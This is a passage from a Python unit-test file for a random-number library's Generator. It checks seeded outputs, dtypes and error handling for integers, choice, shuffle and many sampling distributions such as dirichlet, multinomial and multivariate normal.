def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, "dtype")
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint, dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_warns_byteorder(self):
other_byteord_dt = "<i4" if sys.byteorder == "big" else ">i4"
with pytest.warns(FutureWarning):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.rand(3, 2)
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.randn(3, 2)
desired = np.array(
[
[-3.472754000610961, -0.108938564229143],
[-0.245965753396411, -0.704101550261701],
[0.360102487116356, 0.127832101772367],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_integers(self):
random.bit_generator.seed(self.seed)
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random.bit_generator.seed(self.seed)
with pytest.deprecated_call():
actual = random.integers(
0, 99, size=(3, 2), dtype=np.uint32, use_masked=True
)
desired = np.array([[2, 47], [12, 51], [33, 43]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_lemire_32(self):
# Test lemire algorithm to generate array of uint32 in an interval.
random.bit_generator.seed(self.seed)
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32, use_masked=False)
desired = np.array([[61, 33], [58, 14], [87, 23]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_lemire_64(self):
# Test lemire algorithm to generate array of uint64 in an interval.
random.bit_generator.seed(self.seed)
actual = random.integers(
0, 99 + 0xFFFFFFFFF, size=(3, 2), dtype=np.uint64, use_masked=False
)
desired = np.array(
[
[42523252834, 40656066204],
[61069871386, 61274051182],
[31443797706, 53476677934],
],
dtype=np.uint64,
)
assert_array_equal(actual, desired)
def test_random_integers(self):
random.bit_generator.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3], [-52, 41], [-48, -66]])
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_array_equal(actual, desired + 100)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo("l").max, np.iinfo("l").max)
assert_(len(w) == 1)
desired = np.iinfo("l").max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning, random.random_integers, np.iinfo("l").max)
# DeprecationWarning raised with high != None
assert_raises(
DeprecationWarning,
random.random_integers,
np.iinfo("l").max,
np.iinfo("l").max,
)
def test_random(self):
random.bit_generator.seed(self.seed)
actual = random.random((3, 2))
desired = np.array(
[
[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random.bit_generator.seed(self.seed)
actual = random.random((3, 2))
desired = np.array(
[[0.6187948, 0.5916236], [0.8886836, 0.8916548], [0.4575675, 0.7781881]]
)
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random.bit_generator.seed(self.seed)
actual = random.random(dtype=np.float32)
desired = 0.6187948
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype="int32")
def test_choice_uniform_replace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 1, 2, 0], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([3, 2, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.bit_generator.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.bit_generator.seed(self.seed)
actual = random.choice(["a", "b", "c", "d"], 4)
desired = np.array(["c", "b", "c", "a"])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random.bit_generator.seed(self.seed)
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[4, 5], [2, 3], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random.bit_generator.seed(self.seed)
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[1], [3], [5], [7]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3.0, 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(
ValueError, sample, [1, 2, 3, 4], 3, p=[[0.25, 0.25], [0.25, 0.25]]
)
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(["a", "b"], size=(3, 0, 4)).shape, (3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_nontintiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
choice1 = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
choice2 = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(choice1, choice2)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.0
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
import hashlib
choice_hash = "7d65d45dea0cacb950de86582f37ff74"
random.bit_generator.seed(self.seed)
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != "little":
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert choice_hash == res
def test_choice_very_large_sample(self):
import hashlib
choice_hash = "c1adc3c51a477b4ca642a5643e3dcad85e10a74c600b5299c64f5257bb060155"
random.bit_generator.seed(self.seed)
actual = random.choice(25000, 12500, replace=False)
assert actual.shape == (12500,)
if sys.byteorder != "little":
actual = actual.byteswap()
res = hashlib.sha256(actual.view(np.int8)).hexdigest()
assert choice_hash == res
def test_bytes(self):
random.bit_generator.seed(self.seed)
actual = random.bytes(10)
desired = b"\x82Ui\x9e\xff\x97+Wf\xa5"
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [
lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (
np.asarray([(i, i) for i in x], [("a", int), ("b", int)]).view(
np.recarray
)
),
# gh-4270
lambda x: np.asarray(
[(i, i) for i in x], [("a", (object, (1,))), ("b", (np.int32, (1,)))]
),
]:
random.bit_generator.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for _ in range(50):
random.shuffle(a)
assert_equal(sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.bit_generator.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
def test_beta(self):
random.bit_generator.seed(self.seed)
actual = random.beta(0.1, 0.9, size=(3, 2))
desired = np.array(
[
[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.bit_generator.seed(self.seed)
actual = random.binomial(100.123, 0.456, size=(3, 2))
desired = np.array([[37, 43], [42, 48], [46, 45]])
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
actual = random.binomial(100.123, 0.456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.bit_generator.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array(
[
[22.2534560369812, 46.9302393710074],
[52.9974164611614, 85.3559029505718],
[46.1580841240719, 36.1933148548090],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.bit_generator.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array(
[
[
[0.444382290764855, 0.555617709235145],
[0.468440809291970, 0.531559190708030],
],
[
[0.613461427360549, 0.386538572639451],
[0.529103072088183, 0.470896927911817],
],
[
[0.513490650101800, 0.486509349898200],
[0.558550925712797, 0.441449074287203],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.bit_generator.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_non_contiguous_alpha(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.bit_generator.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.bit_generator.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha), size=(3, 2))
assert_array_almost_equal(contig, non_contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1.0, 1.0e-3])
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array(
[
[[1.0, 0.0], [1.0, 0.0]],
[[1.0, 0.0], [1.0, 0.0]],
[[1.0, 0.0], [1.0, 0.0]],
]
)
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed, mode="sequence"))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random.bit_generator.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array(
[
[5.350682337747634, 1.152307441755771],
[3.867015473358779, 1.538765912839396],
[0.347846818048527, 2.715656549872026],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.0)
def test_f(self):
random.bit_generator.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array(
[
[0.809498839488467, 2.867222762455471],
[0.588036831639353, 1.012185639664636],
[1.147554281917365, 1.150886518432105],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.bit_generator.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array(
[
[12.46569350177219, 16.46580642087044],
[43.65744473309084, 11.98722785682592],
[6.50371499559955, 7.48465689751638],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0.0, scale=-0.0)
def test_geometric(self):
random.bit_generator.seed(self.seed)
actual = random.geometric(0.123456789, size=(3, 2))
desired = np.array([[8, 7], [17, 17], [5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.bit_generator.seed(self.seed)
actual = random.gumbel(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.0)
def test_hypergeometric(self):
random.bit_generator.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[9, 9], [10, 9], [9, 10]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.bit_generator.seed(self.seed)
actual = random.laplace(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.0)
def test_logistic(self):
random.bit_generator.seed(self.seed)
actual = random.logistic(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.bit_generator.seed(self.seed)
actual = random.lognormal(mean=0.123456789, sigma=2.0, size=(3, 2))
desired = np.array(
[
[1.0894838661036e-03, 9.0990021488311e-01],
[6.9178869932225e-01, 2.7672077560016e-01],
[2.3248645126975e00, 1.4609997951330e00],
]
)
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.0)
def test_logseries(self):
random.bit_generator.seed(self.seed)
actual = random.logseries(p=0.923456789, size=(3, 2))
desired = np.array([[2, 2], [6, 17], [3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial(20, [1 / 6.0] * 6, size=(3, 2))
desired = np.array(
[
[[4, 4, 3, 2, 5, 2], [2, 8, 4, 0, 2, 4]],
[[4, 4, 5, 1, 3, 3], [2, 4, 1, 5, 2, 6]],
[[1, 2, 7, 5, 2, 3], [5, 4, 4, 2, 3, 2]],
]
)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial([5, 20], [1 / 6.0] * 6)
desired = np.array([[1, 1, 1, 0, 2, 0], [2, 8, 4, 0, 2, 4]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial([5, 20], [[1 / 6.0] * 6] * 2)
desired = np.array([[1, 1, 1, 0, 2, 0], [2, 8, 4, 0, 2, 4]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial([[5], [20]], [[1 / 6.0] * 6] * 2)
desired = np.array(
[
[[1, 1, 1, 0, 2, 0], [0, 4, 1, 0, 0, 0]],
[[1, 2, 5, 5, 5, 2], [2, 3, 3, 4, 2, 6]],
],
dtype=np.int64,
)
assert_array_equal(actual, desired)
@pytest.mark.parametrize("n", [10, np.array([10, 10]), np.array([[[10]], [[10]]])])
def test_multinomial_pval_broadcast(self, n):
random = Generator(MT19937(self.seed, mode="sequence"))
pvals = np.array([1 / 4] * 4)
actual = random.multinomial(n, pvals)
assert actual.shape == np.broadcast(n, 1).shape + (4,)
pvals = np.vstack([pvals, pvals])
actual = random.multinomial(n, pvals)
assert actual.shape == np.broadcast(n, np.ones(2)).shape + (4,)
pvals = np.vstack([[pvals], [pvals]])
actual = random.multinomial(n, pvals)
expected_shape = np.broadcast(n, np.ones((2, 2))).shape
assert actual.shape == expected_shape + (4,)
actual = random.multinomial(n, pvals, size=(3, 2) + expected_shape)
assert actual.shape == (3, 2) + expected_shape + (4,)
with pytest.raises(ValueError):
# Ensure that size is not broadcast
actual = random.multinomial(n, pvals, size=(1,) * 6)
def test_invalid_pvals_broadcast(self):
random = Generator(MT19937(self.seed, mode="sequence"))
pvals = [[1 / 6] * 6, [1 / 4] * 6]
assert_raises(ValueError, random.multinomial, 1, pvals)
assert_raises(ValueError, random.multinomial, 6, 0.5)
def test_empty_outputs(self):
random = Generator(MT19937(self.seed, mode="sequence"))
actual = random.multinomial(np.empty((10, 0, 6), "i8"), [1 / 6] * 6)
assert actual.shape == (10, 0, 6, 6)
actual = random.multinomial(12, np.empty((10, 0, 10)))
assert actual.shape == (10, 0, 10)
actual = random.multinomial(np.empty((3, 0, 7), "i8"), np.empty((3, 0, 7, 4)))
assert actual.shape == (3, 0, 7, 4)
@pytest.mark.skipif(NP_LT_118, reason="Can only test with NumPy >= 1.18")
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_method(self, method):
from numpy.random import MT19937 as NPMT19937
random = Generator(NPMT19937(self.seed))
mean = (0.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array(
[
[
[-1.747478062846581, 11.25613495182354],
[-0.9967333370066214, 10.342002097029821],
],
[
[0.7850019631242964, 11.181113712443013],
[0.8901349653255224, 8.873825399642492],
],
[
[0.7130260107430003, 9.551628690083056],
[0.7127098726541128, 11.991709234143173],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check path with scalar size works correctly
scalar = random.multivariate_normal(mean, cov, 3, method=method)
tuple1d = random.multivariate_normal(mean, cov, (3,), method=method)
assert scalar.shape == tuple1d.shape == (3, 2)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(
RuntimeWarning, random.multivariate_normal, mean, cov, method="eigh"
)
assert_raises(
LinAlgError, random.multivariate_normal, mean, cov, method="cholesky"
)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov, check_valid="ignore")
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
assert_raises(
ValueError,
random.multivariate_normal,
mean,
cov,
check_valid="raise",
method="eigh",
)
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ("svd", "eigh"):
samples = random.multivariate_normal(mean, cov, size=(3, 2), method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1], decimal=6)
else:
assert_raises(
LinAlgError, random.multivariate_normal, mean, cov, method="cholesky"
)
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="other"
)
assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed, mode="sequence"))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
@pytest.mark.parametrize("size", [(4, 3, 2), (5, 4, 3, 2)])
@pytest.mark.parametrize("mean", [np.zeros(2), np.zeros((3, 3))])
def test_multivariate_normal_bad_size(self, mean, size):
cov = np.eye(4)
with pytest.raises(ValueError):
random.multivariate_normal(mean, cov)
mean = np.zeros((2, 3, 4))
with pytest.raises(ValueError):
random.multivariate_normal(mean, cov, size=size)
with pytest.raises(ValueError):
random.multivariate_normal(0, [[1]], size=size)
with pytest.raises(ValueError):
random.multivariate_normal([0], [1], size=size)
def test_multivariate_normal(self):
random.bit_generator.seed(self.seed)
mean = (0.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array(
[
[
[-3.34929721161096100, 9.891061435770858],
[-0.12250896439641100, 9.295898449738300],
],
[
[0.48355927611635563, 10.127832101772366],
[3.11093021424924300, 10.283109168794352],
],
[
[-0.20332082341774727, 9.868532121697195],
[-1.33806889550667330, 9.813657233804179],
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([-1.097443117192574, 10.535787051184261])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn"t warn with RuntimeWarning check_valid="ignore"
